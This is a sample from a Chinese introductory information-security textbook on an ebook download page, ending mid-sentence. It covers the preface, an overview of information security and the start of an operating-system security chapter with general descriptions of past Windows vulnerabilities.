信息安全导论(在线实验+在线自测)(txt+pdf+epub+mobi电子书下载)


发布时间:2020-07-21 12:47:27

点击下载

作者:杨种学 孙维隆 李滢

出版社:人民邮电出版社有限公司

格式: AZW3, DOCX, EPUB, MOBI, PDF, TXT

信息安全导论(在线实验+在线自测)

信息安全导论(在线实验+在线自测)试读:

前言

信息是社会发展的重要战略资源。国际上围绕信息获取、使用和控制的斗争愈演愈烈,信息安全变得至关重要,已成为维护国家安全和社会稳定的一个焦点,各国都给予了极大的关注和投入,信息安全已成为信息科学的热点课题之一。

2015年,经教育部批准,网络空间安全一级学科正式设立,这标志着我国对信息安全人才的培养进入了新的阶段。除高校根据该一级学科的建设要求进一步完善人才培养方案之外,从事信息安全实训等相关工作的企业也可与高校协作,帮助学校加强实践环节教学,帮助学生了解知识的应用场景,从而培养出高素质的信息安全人才队伍。

基于上述背景,编者结合多年的网络安全工作经验和教学经验,以“理论+实践+知识拓展”为主线,根据“教、学、做一体化”的教学方法编写了本书。在完成技术讲解的同时,本书利用“实验吧”里丰富的在线实验资源,帮助读者加深对理论知识点的理解,增强实践技能,最后对读者提出相应的自学要求和指导,以达到深入学习相关知识的目的。

本书面向信息安全初学者,力求为读者展示信息安全的技术脉络和基本的知识体系,为读者后续的专业课学习和深造打下基础。因此,本书在内容组织和编写上,遵循如下理念。(1)具有科学合理的知识体系。本书按照由浅入深的顺序,逐渐引入相关技术与知识,实现技术讲解与训练合二为一,有助于“教、学、做一体化”教学方法的实施。(2)发挥企业的优势。本书将行业案例与基本的信息安全理论体系相融合来组织全书内容,为读者展示从技术视角出发的信息安全知识体系。(3)突出前沿性和实用性。随着信息技术的发展,信息安全领域也出现了很多新问题,如移动终端安全、物联网安全、云计算和大数据安全等,本书对这些热点领域面临的安全问题和现有的解决方案均做了介绍。(4)配备丰富的学习和教学资源。为帮助高校教师使用本书进行教学,本书为教师配备了相关的教学辅助资源。本书通过“图书+网络实训资源”的形式提供了完善的、贴近实际应用的课程体系,并配备了大量的在线实操演练场景,为广大个人用户提供了便捷的网络安全实训服务。

本书由杨种学、孙维隆、李滢任主编,郑豪、马云涛、林雪纲、邹温林任副主编,参与编写的还有时允田、杨志鹏、李彩霞、黄金龙、平立振。此外,在编撰过程中,徐立丹、王宜海、张洋等人进行了排版和校对,特此表示感谢!

由于编者水平有限,书中不妥之处在所难免,殷切希望广大读者指正。同时,恳请读者一旦发现问题,于百忙之中及时与编者联系,以便尽快更正,编者将不胜感激,E-mail: sunweilong@simpleedu.com.cn。编者2018年11月第1章 信息安全概述

随着互联网的不断普及和互联网技术的快速发展,计算机网络逐渐成为当今社会最广泛最重要的基础设施之一,人们生活和工作中的很多时间都离不开计算机网络,但网络的普遍使用也使得信息安全问题日益增多。信息安全与个人安全、社会安全乃至国家安全都密不可分。1.1 发生在人们身边的信息安全问题

一提到信息安全,很多人就会想到“黑客”,觉得信息安全很神秘,甚至离现实生活很遥远。但实际上,在互联网时代,信息安全与我们的生活和工作是息息相关的,信息安全问题无处不在,在人们身边就发生过以下安全事件和威胁。

1. 支付宝被盗刷

不久前,宋先生发现自己支付宝内余额中的6 650元和余额宝中的5万元存款相继被转走,与支付宝绑定的工商银行卡也被转走了7 001元,另外还有一笔19 999元的转账正在进行中,尚未完成。意识到自己的支付宝被盗刷后,宋先生立即打电话通知支付宝客服停止这笔正在进行中的19 999元的转账,并向警方报案。

2. QQ密码被盗

曾经有不法分子在网络上购买了病毒软件和木马程序后,再通过网络上的信息搜集平台或工具,找出或购买财务人员的QQ群等信息,并以同行的名义入群,待潜伏一段时间后,大量地群发伪装过的带有病毒或者木马的邮件,等待有人打开该伪装邮件,如有人无意打开,则会被不法分子盗取QQ密码。

3. 银行卡被盗刷

吴先生收到了一条陌生号码发来的短信,短信上写着自己的名字,吴先生以为是某个没存号码的朋友发来的,就点击了短信中的图片。一个星期之后,银行突然发来一条消费短信,原本存有5万多元人民币的一张银行卡,余额竟然只剩下300多元了。

4. 操作系统面临的威胁

目前常用的操作系统是Windows和Linux,这两种系统也面临着信息安全的威胁。例如,2016年微软在其官网发布的一份公告中表示,目前发现了少量来自俄罗斯黑客组织“Strontium”发起的网络攻击,这些黑客利用了Windows操作系统上的一处漏洞,并在其攻击过程中使用了“鱼叉式网络钓鱼”邮件作为工具。

5. 应用程序面临的威胁

我们常用的应用程序也面临着信息安全问题,例如,2015年网易服务器出现大面积瘫痪,导致多数网易产品和客户端无法连接和刷新,网易旗下部分服务暂时无法正常使用。没过多久,网易邮箱又出了问题,7月16日晚,陆续有网友在微博上反映网易邮箱出现登录故障,网页端显示“繁忙的系统暂时需要停下歇歇,请您稍后再试。”也有网友反馈,126邮箱突然提示服务器密码更改,通过重输密码、修改密码等方式也无法正常登录。

以上只是曾经发生在人们身边的一部分信息安全事件和威胁,大量的安全问题还在不断地涌现,信息安全问题已经渗透到了我们的日常生活和工作中。1.2 信息安全的基本认识

通过上面的几个案例可以看出,人们在使用信息设备和网络资源时所引发的信息安全问题越来越多,影响越来越严重。那么到底什么是信息安全?它又是如何发展起来的呢?接下来将对这些内容进行论述。1.2.1 信息安全的发展历程

20世纪40年代,通信保密正式进入学术界的视野。20世纪50年代,科技文献中开始出现“信息安全”一词,至20世纪90年代,“信息安全”一词陆续出现在各国和地区的政策文献中,相关的学术研究文献也逐步增加。信息安全的发展历程大体上可以分为“通信安全时代”和“信息安全时代”两个阶段。

1. 通信安全时代

此阶段始于20世纪60年代,这个阶段一般认为信息安全就是通信安全,研究如何对信息进行编码,然后在通信信道上传输,从而防止攻击者通过窃听通信信道来获取信息。

2. 信息安全时代

此阶段始于20世纪80年代,这一阶段开始采用信息安全及其属性来描述其内涵,并提出完整性、可用性、机密性、可靠性、不可否认性,其中,机密性、完整性和可用性是信息安全的三个基本目标。这三个基本目标又被称作CIA三准则,内容如图1-1所示,其作用是为了保障信息“看不到”“改不了”和“用得着”。图1-1 CIA三准则

进入21世纪后,“信息安全”一词出现的范围不断扩大,在各类文献中出现的频次也不断增加,“信息安全”成为各国安全领域聚焦的重点,其既包括理论的研究,也包括国家秘密、商业秘密和个人隐私保护的探讨;既包括国家战略的策划,也包括信息安全内容的管理;既包括信息安全技术标准的制定,也包括国际行为准则的起草。信息安全已成为全球总体安全和综合安全最重要的非传统安全领域之一。1.2.2 信息安全的含义

所谓信息安全,是指保障国家、机构、个人的信息空间、信息载体和信息资源不受来自内外各种形式的危险、威胁、侵害和误导的外[1]在状态和方式及内在主体感受。它是为维护计算机网络的正常秩序,避免信息、言论被滥用,避免对个人隐私、社会稳定、经济发展、国家安全造成恶劣影响而采取的一切措施,也就是为确保网络和信息系统的安全性,所建立和采取的一切技术层面和管理层面的安全防护举措,包括避免联网硬件、网络传输、软件和数据不因偶然和恶意的原因而遭到破坏、更改和泄露,使系统能够连续、正常运行而采取的技术手段或管理监督的办法,以及对计算机网络中一切可能危害他人或国家利益的行为进行约束、监管及预防和阻止的措施。

以数字化、网络化、智能化、互联化、泛在化为特征的网络社会,为信息安全带来了新技术、新环境和新形态,信息安全开始更多地体现在网络安全领域,反映在跨越时空的网络系统和网络空间之中,反映在全球化的互联互通之中。由于人类开始生存在信息环境当中,人与信息相互作用相互影响,因此信息安全问题更加突出。

目前,一方面是信息技术与产业的空前繁荣,另一方面是危害信息安全的事件不断发生。敌对势力的破坏、黑客的攻击、恶意软件的侵扰、利用计算机进行的犯罪、隐私的泄露等,对信息安全构成了极大威胁。除此之外,科学技术的进步也对信息安全提出了新的挑战。由于量子和DNA计算机具有并行性,许多现有公钥密码(RSA、ELGamal、ECC等)在量子和DNA计算机环境下不再安全。可见,信息安全形势越来越严峻。1.2.3 信息安全的危害

信息安全形势日益严峻,国家政治、经济、文化、社会、国防安全及公民在网络乃至生活当中的合法权益面临严峻风险与挑战。(1)信息渗透危害政治安全。政治稳定是国家发展、人民幸福的基本前提。利用网络干涉他国内政、攻击他国政治制度、煽动社会动乱、颠覆他国政权,以及大规模网络监控、信息窃密等活动严重危害国家政治安全。(2)网络攻击威胁经济安全。网络和信息系统已经成为关键基础设施乃至整个经济社会的神经中枢,遭受攻击破坏、发生重大安全事件,将导致能源、交通、通信、金融等基础设施瘫痪,造成灾难性后果,严重危害国家经济安全和公共利益。(3)有害信息侵蚀文化安全。网络上各种思想文化相互激荡、交锋,优秀传统文化和主流价值观面临冲击。网络谣言、颓废文化和淫秽、暴力、迷信等违背社会主义核心价值观的有害信息可能会侵蚀青少年身心健康,败坏社会风气,误导价值取向,危害文化安全。网上道德失范、诚信缺失现象频发,网络文明程度亟待提高。(4)网络恐怖和违法犯罪破坏社会安全。恐怖主义、分裂主义、极端主义等势力利用网络煽动、策划、组织和实施暴力恐怖活动,直接威胁人民的生命财产安全和社会秩序。计算机病毒、木马等在网上传播蔓延,网络欺诈、黑客攻击、侵犯知识产权、滥用个人信息等不法行为大量存在,一些组织肆意窃取用户信息、交易数据、位置信息及企业商业秘密,严重损害国家、企业和个人利益,影响社会和谐稳定。1.2.4 信息安全技术体系

信息安全涉及的领域众多,内涵丰富,且信息安全很多相关技术尚在飞速发展中,本书无法将所有内容完整呈现,而是把学术界和产业界对信息安全的阐述做了整合,涵盖了信息安全的主要内容,重点讨论几个核心内容和热点问题,包括操作系统安全、Web应用安全、网络安全、物联网安全、移动互联网终端安全、云计算及其安全、大数据及其安全和隐私保护。从信息安全的现状和发展来看,这几个层次相互依存、相互交织、相互渗透,而且在一定条件下能够相互转化。

本书的信息安全技术体系架构如图1-2所示。图1-2 信息安全技术体系

本书的技术体系主要包括以下一些内容。(1)操作系统安全。本章通过对PC和移动终端操作系统常见的安全问题进行讲解,使读者对操作系统安全有更加全面的认识和理解,学会如何更加有效地保护操作系统。(2)Web应用安全。本章主要从Web应用安全基础、常见的Web应用安全漏洞及防护方法等几个方面来阐述Web应用系统的安全问题,使读者对Web应用安全有更加全面的认识和理解。(3)网络安全。本章主要介绍部分网络安全协议、网络层所存在的常见攻击方式和网络安全防御手段。(4)物联网安全。本章将论述物联网的定义和应用领域,物联网的安全特征与架构,以及工业物联网及其安全,使读者能够对什么是物联网、物联网都有哪些安全特性和物联网安全等方面的知识有较为全面的认识和理解。(5)移动互联网终端安全。本章从手机、PAD等移动互联网终端行业,来介绍移动终端在新时期互联网时代下面临的安全威胁及防护方法。(6)云计算及其安全。本章将从云的技术核心、服务类型及发展趋势等方面对当下网络环境中的云做深度剖析。同时针对受到越来越多关注的云安全问题,提出相应的预防和解决方案。(7)大数据及其安全。从技术上看,大数据与云计算的关系就像一枚硬币的正反面一样密不可分,大数据要依托于云计算基础设施进行大容量数据的存储、挖掘和分析处理。本章将从大数据的价值、一些典型行业的大数据应用和安全风险,以及大数据应用安全解决思路等几个方面来讲解大数据的安全问题。(8)隐私保护。我们有的时候并不愿意把某些信息告诉给他人,对于个人来说,这些信息被称作隐私,在团队中也有某些信息是不想公布于众的,这些信息大多数被称作保密信息。在本书中,无论是个人的还是团队的信息,统称为隐私,本章将对隐私保护方面的内容进行深入讲解。1.3 信息安全当前的特点及未来发展趋势1.3.1 信息安全的当前特点

当前,信息安全问题日益严重,网络渗透的方法越来越隐蔽,形式也越来越多样化,信息安全呈现出以下一些特点。

1. 安全攻击的高级性

在国际互联网的背景下,人们面临的安全攻击级别更高,隐蔽性更强,技术更强大,给信息安全防护带来了前所未有的挑战。信息安全成了政治博弈的主战场,成了窃密与反窃密斗争的前沿阵地,也成了不法分子进行犯罪活动的暗舞台。近年来,有组织的网络犯罪、网络恐怖主义甚至国家层面的高级攻击行为给新形势下的信息安全构成的巨大威胁日益严重。

2. 安全威胁的多元性

安全威胁出现了攻击多元性的特点。在国际互联网条件下,攻击的对象、手段、形式都层出不穷,呈现出多样化、多类型、特征复杂的态势,安全威胁的多元性,使各类互联网终端都受到影响。

3. 安全危害的倍增性

在国际互联网条件下,各网络相互融合,信息互通和共享性更强,信息安全危害性也更广,一旦出现安全事件,其危害会迅速从区域向广域扩散,由个体向群体蔓延,由一种危害引发多种危害,呈现出非线性激增的态势。

4. 安全对抗的非对称性

根据木桶原理,信息安全体系中出现任何一个薄弱环节,都可能对整体安全体系构成威胁,造成无法估量的严重后果。信息安全防护本身就是一个难守易攻的领域,对于攻击者而言,被攻击目标总是明确的,漏洞总是可以被试探和挖掘的,因此,可以通过搜集、尝试所有可用资源,发动针对目标的攻击;而对于防护者而言,攻击感知、攻击类型分析、密码破译感知等一直以来都是难题,使得安全对抗具有明显的非对称性。1.3.2 信息安全未来发展趋势

目前,信息安全呈现出安全攻击高级性、多元性、倍增性和非对称性等特点,信息又是继陆、海、空、天以外的第五作战空间和“军事高地”,是人类活动的新领域,已经成为与经济、社会、政治、文化相联系的纽带。未来信息安全的发展趋势可分为以下几个方向。

1. 万物互联

随着新一代移动通信技术、Web 2.0等网络技术的发展,以及移动互联网、物联网、云计算和大数据等应用的普及,网络已进入“万物互联、智慧互通”的新时代,同时也标志着信息化进入“以数据的深度挖掘与融合应用为特征的智慧化”新阶段,信息的获取和利用即将达到“信息随心行,交互在指间;搜索随意行,推荐在指间”的理想境界。

2. 业务网与工控网互联互通是未来发展趋势

未来各种业务网络互联互通是技术演化的必然结果,大多数场景下,网络之间的物理隔离将不复存在,亟须研究高强度逻辑隔离技术来应对未来广泛互联互通的网络所带来的安全隐患。例如,过去的防护和管控往往分布在不同的设备上,未来需要能够实现防护、管控、感知和处置的综合安全防护设备。

3. 更容易出现重大的信息泄露事件

人类生活越来越依靠现代科技、互联网、移动互联网和物联网,以及随之而来的大数据和云服务,加上黑客行为的组织化和产业化,这些将很有可能造成下一次重大信息泄露事件的发生。云服务的快速普及和应用,使其越来越受到恶意黑客的关注,而且云服务的完全依赖在线服务和一套登录口令对应所有信息存储服务的特性,更有可能使其爆发出大规模的恶性信息泄露事件。

4. 攻防技术的矛与盾,攻击者的技术也在不断进化

随着网络攻防强度、频率、规模,以及影响力的不断升级,未来的安全技术将逐渐朝自动化、智能化、定制化和整体化等方向发展,在单点防护和检测上越来越深,同时在整体防护上更加系统和智能。不仅能够防范已知的攻击,还能够感知即将发生的威胁,预先采取措施。

总而言之,如今对信息安全的研究已引起世界各国的高度重视,吸收和借鉴国外相关领域的先进理念和科学方法,对推动和促进我国在信息安全领域的发展具有重要意义。长路漫漫,任重道远,我们需要突破以往的发展思路,调动各方科研力量,尝试多种创新实践方法,从根本上解决制约信息安全长远发展的难题,摆脱受制于人的不利局面,占领信息制高点。纵观信息技术发展的历史,就是已有科幻不断成为现实的展现,未来的科幻将不断地涌现,也会持续不断地成为现实。1.4 本章小结

本章首先描述了曾经发生在人们身边的一些信息安全问题,并对信息安全的发展历程、信息安全的含义及其危害进行了论述。然后对本书所涉及的信息安全技术进行了体系化的整理和说明,最后对信息安全当前的特点和未来发展趋势进行了展望,使读者充分认识到学习信息安全的重要性和紧迫性,为继续学习后面的操作系统安全、Web应用安全和网络安全等章节打下良好的基础。1.5 课堂练习(1)信息安全的发展背景是什么?(2)信息安全的危害有哪些?(3)信息安全的当前特点是什么?1.6 课后作业(1)什么是信息安全?(2)信息安全未来的发展前景如何?(3)列举一些你身边遇到或发现的信息安全问题,尝试分析其中的原因,并说明有哪些防范措施。1.7 拓展学习

如果读者对信息安全感兴趣,想进一步了解相关技术,可以参阅由清华大学出版社出版,郝玉洁、吴立军、赵洋、刘瑶编著的《信息安全概论》,进行深入学习。扫一扫在线测第2章 操作系统安全

随着科学技术的不断进步,计算机网络得到了蓬勃发展,作为信息技术的基石,功能日益完善的操作系统正在迅速改变人们的生活模式。一方面,操作系统的发展让人们在处理各种事物和问题时更加地舒适便捷,极大地提高了效率,另一方面,操作系统的发展速度远远地超过了信息安全技术的更新速度,导致系统中各种安全问题激增,人们越是依赖计算机,操作系统安全的重要性越是不言而喻。

2017年5月,一种名为WannaCry(又名Wanna Decryptor)的“蠕虫式”勒索病毒软件席卷全球,先后有100多个国家的计算机受到病毒感染,欧洲各国、美国、中国是重灾区,计算机被攻击后,磁盘文件会被病毒加密,攻击者要求感染者支付相当于300美元的比特币方可解锁,而且赎金会随着时间的延长而增加。不到半个月的时间,我国已有29 372家组织和机构的数十万台机器被感染,影响范围遍布高校、火车站、自助终端、邮政、加油站、医院、政府办事终端等。

事后调查发现,WannaCry是由不法分子利用美国国家安全局(National Security Agency, NSA)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播的,实际上,历史上像这样利用系统漏洞或者恶意代码对操作系统进行恶意攻击的事件屡见不鲜,操作系统面临的安全形势不容乐观。面对层出不穷的新型网络攻击,基于操作系统层的防护变得至关重要,它是保障我们数据资产不受威胁的重要阵地,也是最后一道安全防线。

本章我们将通过学习操作系统常见的安全问题及方法措施,使读者对系统安全有更加全面的认识和理解,并学会如何更加有效地保护操作系统。2.1 操作系统概述2.1.1 操作系统概述

世界上第一台通用计算机(简称“ENIAC”)的操作模式是最原始的人工直接操作硬件,这种操作模式造成了第一代通用计算机的明显缺点,首先一次只能供一个用户使用,其次不同的硬件要求程序员做出不同的编程,程序通用性差,并且由于依靠打孔的形式进行编程,一旦出现任何一点错误,就需要重新编程,工作量大。于是随着硬件的发展和使用者的需求,从20世纪70年代中期开始出现了计算机操作系统(Operating System, OS)。

那么具体什么才是操作系统呢?我们先通过图2-1来看一下操作系统在计算机系统中的位置。

通过图2-1我们可以看到,操作系统在计算机系统中位于硬件和应用软件之间,所以,操作系统既面向系统资源又面向用户。面向系统资源时,操作系统必须尽可能提高资源利用率;面向用户时,操作系统必须提供方便易用的用户界面。图2-1 操作系统在计算机系统中的位置

从用户角度看,操作系统是用户使用计算机的界面,提供了用户与计算机硬件之间的接口,一般分为3种方式:命令方式、系统调用方式、图标——窗口方式。从软件角度看,操作系统是程序与数据结构的集合,它是直接和硬件相邻的第一层软件,是由大量极其复杂的系统程序和众多的数据结构集成的。从系统角度看,操作系统能够对计算机资源进行管理,这些资源包括硬件和软件。操作系统向用户提供了高级而调用简单的服务,掩盖了绝大部分硬件设备复杂的特性和差异,使得用户可以免除大量乏味的杂务,而把精力集中在自己所要处理的任务上。

操作系统主要具有3个作用。(1)操作系统让计算机根据用户的需求合理而有效地组织管理各类资源,最大限度地发挥它的作用,充分实现系统的各种功能,提高系统的工作效率。(2)操作系统创造了用户和计算机之间的友好界面。在操作系统的协助下,用户能够方便灵活、安全可靠、经济有效地使用计算机解决实际问题。(3)操作系统的发展使得软件编程有了良好便捷的开发和运行环境。多种多样的软件也极大地丰富和方便了我们现在的生活。

总而言之,操作系统是一组能够控制和管理计算机硬件和软件资源,合理地对各类作业进行调度,以及方便用户的程序集合,是直接运行在“裸机”上的最基本的系统软件。其他任何软件都必须在操作系统的支持下才能运行,它是连接用户和计算机硬件的接口。2.1.2 操作系统的功能

通过操作系统的概念可以知道,操作系统是计算机中具有一定功能的软件系统,它的目的是方便用户使用计算机资源和提高计算机资源的利用率。在计算机系统中,操作系统提供了以下功能。

1. 提供人机接口

用户是通过操作系统提供的人机接口来使用计算机的,操作系统为用户提供了两种接口,即作业控制级接口、程序级接口。(1)作业控制级接口

作业是用户一次请求计算机系统为其完成的工作的总和。一个作业通常是由若干个相对独立、顺序相关的作业步构成的。

作业控制级接口是用于作业控制的,用户需要按自己的需求对作业流程进行控制。作业控制级接口就是系统为用户提供的实现手段,它通过在用户和操作系统之间提供高级通信来控制一组程序的处理。这个接口又称命令接口,用户可以通过键盘输入或在作业中发出一系列命令,告诉操作系统执行哪些功能。它分联机用户接口和脱机用户接口。

联机用户接口也称交互式用户接口,它用于对联机作业的控制,是由一组键盘字符命令(或鼠标命令)和命令解释器组成的。用户可以使用联机交互方式使用计算机,用户每键入一个合法的命令(解释器能执行的命令),则启动一个作业步,一个作业步执行完毕后,再键入下一个命令,则启动下一个作业步,直至整个作业的完成。交互式用户接口又分为键盘字符命令接口和图形接口。

脱机用户接口也称批处理用户接口,它用于脱机作业控制。用户利用作业控制语言将对作业流程的控制意图书写成一份作业说明书交由系统。这种模式下一旦作业提交,用户将无法干预作业的运行,因此,必须事先设计好作业流程,预想可能出现的错误并给出相应的处理方法。(2)程序级接口

程序级接口是为用户在程序一级提供相关服务而设置的,由一系列系统功能调用命令组成。操作系统通过程序级接口为用户提供了用于完成某些通用功能的程序,供用户在开发程序时使用,方便用户编程,提高编程效率。

2. 管理计算机资源

计算机系统中的资源分为硬件资源和软件资源。硬件资源包括处理机、存储器、外部设备,软件资源包括程序和数据。现代计算机系统大多为单用户多任务操作系统或者多用户多任务操作系统。这就意味着计算机资源可能会同时被多个程序共同使用,如何合理分配资源、提高系统运行效率是操作系统需要解决的问题。计算机资源的管理主要分为以下几个方面。(1)处理机管理

处理机的任务是运行程序,程序在某个数据对象上的一次运行过程称为进程,所以处理机管理又称为进程管理。进程管理的主要功能包括创建和撤销进程,对诸进程的运行进行协调,实现进程之间的信息交换,以及按照一定的算法把处理机分配给进程。处理机管理主要包括进程控制、进程同步、进程通信、进程调度。(2)存储管理

存储管理可在多道程序环境中,保证内存中的多道程序顺利运行,提高内存使用率,并在逻辑上扩充内存。存储管理功能主要包括内存分配、内存保护、地址映射、内存扩充。(3)设备管理

设备管理的任务是接受用户的I/O请求,为用户程序分配I/O设备,并完成指定I/O操作。设备管理的任务还包括使CPU和I/O设备并行操作,提高CPU和I/O设备的利用率,提高I/O速度,方便用户使用I/O设备。设备管理主要包括缓冲管理、设备分配、设备处理(设备驱动程序)。(4)文件管理

文件管理的主要任务是对用户文件和系统文件进行管理以方便用户使用,并保证文件的安全性。文件管理主要包括文件存储空间的管理、目录管理、文件的读/写管理和保护。2.1.3 几种典型的操作系统

1. Windows

Microsoft Windows是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是Microsoft-DOS模拟环境,后来,系统版本不断地更新升级,慢慢地成为人们喜爱的操作系统。

Windows采用了图形化界面(GUI)模式,比起从前DOS的需要键入指令使用的方式更为人性化。随着计算机硬件和软件的不断升级,微软的Windows也在不断升级,从16位、32位再到64位系统,版本从最初的Windows 1.0到大家熟知的Windows 98、Windows XP、Windows 7、Windows 10和Windows Server服务器企业级操作系统,不断持续更新,微软一直在致力于Windows操作系统的开发和完善,图2-2所示就是Windows 10的操作界面。图2-2 Windows 10的操作界面

Windows系统也会被用在低级和中级服务器上,并且支持网页服务、数据库服务等。微软花费了大量的经费用于研究和开发,以使Windows系统拥有运行企业大型程序的能力。

2. Linux

Linux是一套免费使用和自由传播的类UNIX操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。它支持32位和64位硬件。Linux继承了UNIX以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统。

Linux操作系统诞生于1991年10月5日(这是其作者第一次正式向外公布的时间)。Linux存在着许多不同的版本,但它们都使用了Linux内核。Linux可安装在各种计算机硬件设备中,如手机、平板电脑、路由器、视频游戏控制台、台式计算机、大型机和超级计算机。严格来讲,Linux这个词本身只表示Linux内核,但实际上人们已经习惯了用Linux来形容整个基于Linux的内核。Linux是使用GNU工程的各种工具和数据库的操作系统,Linux Centos7版本的操作界面如图2-3所示。图2-3 Linux Centos7版本的操作界面

3. Mac OS X

Mac OS是一套运行于苹果Macintosh系列计算机上的操作系统。Mac OS由美国苹果公司自主开发,是首个在商用领域取得成功的图形用户界面操作系统。Mac系统是基于UNIX内核的图形化操作系统,一般情况下,在普通PC上无法安装。Mac计算机的操作系统已经更新到了OS 10,代号为Mac OS X(X为10的罗马数字写法),这是Mac计算机诞生15年来最大的变化。新系统非常可靠,它的许多特点和服务都体现了苹果公司的理念。2011年7月20日,Mac OS X正式被苹果公司改名为OS X,经过历年更新,苹果公司于2017年6月5日举行了开发者大会,将Mac OS再次进行了更新,苹果给它起名为“High Sierra”,界面如图2-4所示。图2-4 Mac OS界面

4. Android®

Android是一种基于Linux V2.6内核的综合操作系统。最初,Android的部署目标是移动电话领域,包括智能电话和更廉价的翻盖手机。Android操作系统最初由Andy Rubin开发,他于2003年10月创建了Android公司,并组建了Android团队。2005年,Android公司被Google公司收购注资,后来逐渐研发改良的Android系统扩展到平板电脑及其他领域上。Android的主要竞争对手是苹果公司的iOS以及RIM的Blackberry OS。2011年第一季度,Android在全球的市场份额首次超过塞班系统,跃居全球第一。2013年9月24日,谷歌开发的操作系统Android迎来了5岁生日,全世界采用这款系统的设备数量已经达到10亿台。2017年,市场调研机构Gartner公布了第一季度智能手机市场报告,报告显示Android的市场份额已经达到了86.1%,图2-5所示是某款Android手机的操作界面。图2-5 某款Android手机的操作界面

5. iOS

iOS是由苹果公司为iPhone开发的操作系统,它主要是给iPhone、iPod touch及iPAD使用的。原本这个系统名为iPhone OS,直到2010年6月7日,在WWDC大会上宣布其改名为iOS。该系统最初是设计给iPhone使用的,后来陆续套用到了iPod touch、iPAD及Apple TV等苹果产品上。iOS与苹果的Mac OS X操作系统一样,属于类UNIX商业操作系统,图2-6所示是某款iOS手机的操作界面。图2-6 某款iOS手机的操作界面2.2 操作系统的安全威胁

操作系统是计算机最基本的系统软件,其他的应用软件都是在操作系统之上运行的。可以说谁能控制操作系统,谁就基本掌握了计算机上的所有信息。研究表明,很多安全问题源于操作系统的脆弱性。如今,互联网的开放性以及网络技术的泛滥,使得操作系统遭受到了越来越多入侵攻击的威胁。下面来介绍操作系统可能会面临的一些安全威胁。2.2.1 漏洞威胁

对计算机系统安全威胁最大的就是系统本身的漏洞。只有存在漏洞,黑客才有机会入侵我们的计算机系统。据统计,99%的黑客攻击事件都是黑客利用计算机未修补的系统漏洞与错误的系统设定而引起的,当黑客探测到操作系统漏洞后,随之而来的便是针对系统的渗透入侵或者病毒传播等攻击,这将会造成计算机信息泄露、运行速度缓慢甚至整个系统瘫痪崩溃。那么到底什么是漏洞呢?

系统漏洞,也可以称为系统脆弱性(Vulnerability),是指计算机系统在硬件、软件、协议的设计、具体实现及系统安全策略上存在的缺陷和不足。系统脆弱性是相对系统安全而言的,从广义的角度来看,一切可能导致系统安全性受影响或被破坏的因素都可以视为系统漏洞。

1. 漏洞对操作系统的影响

从操作系统软件编写完成开始运行的那一刻起,系统漏洞也就伴随着产生了。作为迄今为止使用频率最高的操作系统,Windows操作系统的安全性虽然随着版本的更新一直在不断提高,但由于人为编写的缘故,始终存在漏洞和缺陷,下面来分析Windows操作系统中曾经存在过的一些漏洞。(1)UPnP服务漏洞

此漏洞允许攻击者执行任意指令。Windows操作系统默认启动的通用即插即用(Universal Plug and Play, UPnP)服务存在严重漏洞。UPnP是一种允许主机定位和使用局域网上设备的服务,它可以利用IP地址使计算机、扫描仪、打印机、数码相机等设备互相自动搜寻以便进行通信。UPnP存在漏洞,使得黑客可以利用这类漏洞取得其他计算机的完全控制权,或者发动DDoS攻击。(2)帮助和支持中心漏洞

此漏洞可以删除用户系统的文件。Windows XP具有“帮助和支持中心”功能,通过利用该漏洞,当用户与Internet联接时,黑客就可以利用向微软公司发送的新硬件资料代码中的安全缺陷。从网页或HTML格式电子邮件中的链接对存在这一缺陷的计算机进行远程访问时,就能够打开或删除被攻击计算机上的文件。(3)RDP信息泄露并拒绝服务漏洞

Windows操作系统通过RDP(Remote Desktop Protocol)为客户端提供远程终端会话。RDP将终端会话的相关硬件信息传送至远程客户端,这一过程可能存在一些漏洞。

① 与某些版本的会话加密有关的漏洞。所有RDP实现均允许对RDP会话中的数据进行加密,然而在Windows 2000和Windows XP版本中,纯文本会话数据的校验在发送前并未经过加密,窃听并记录RDP会话的攻击者可对该校验密码进行分析,然后攻击并覆盖该会话传输。

② 与Windows XP中的RDP实现对某些不正确的数据包的处理方法有关的漏洞。当接收到不正确的数据包时,远程桌面服务将会失效,同时也会导致操作系统失效。攻击者只需向一个已受影响的系统发送这类数据包,则并不需经过系统的验证,就能对该操作系统进行攻击。(4)VM漏洞

Windows操作系统和IE浏览器等软件所包含的Java运行环境“Microsoft Virtual Machine for Internet Explorer(Microsoft VM)”中存在3种安全漏洞。

① 如果向JDBC类文件(.class文件)传输非法参数,IE就会异常关闭。

② 如果向JDBC类文件传输非法参数,会随机执行动态链接库(DLL)。

③ 利用恶意的Java程序(Java Applet),就可以执行任意代码。

当用户浏览恶意使用这些安全漏洞的网页和HTML格式电子邮件时,IE就有可能异常关闭,或执行任意程序。一旦执行了这些程序,整个计算机就会被攻击者控制。(5)账号快速切换漏洞

Windows操作系统快速账号切换功能存在的漏洞,可造成账号被锁定,使所有非管理员账号均无法登录。当单击“开始”→“注销”→“切换用户”启动快速用户切换功能,在传统登录方法下重试登录同一个用户名时,系统会误认为有暴力猜解攻击,因而会锁定全部非管理员账号。

2. 系统漏洞产生的原因

可以看出操作系统经常会出现各种漏洞,这些漏洞的产生原因大致可以分为以下3种。(1)程序逻辑结构设计漏洞。编程人员在设计程序时,如果对程序逻辑结构设计不合理、不严谨,就可能会产生一处或多处漏洞,这些漏洞为病毒的入侵提供了入口。例如Windows 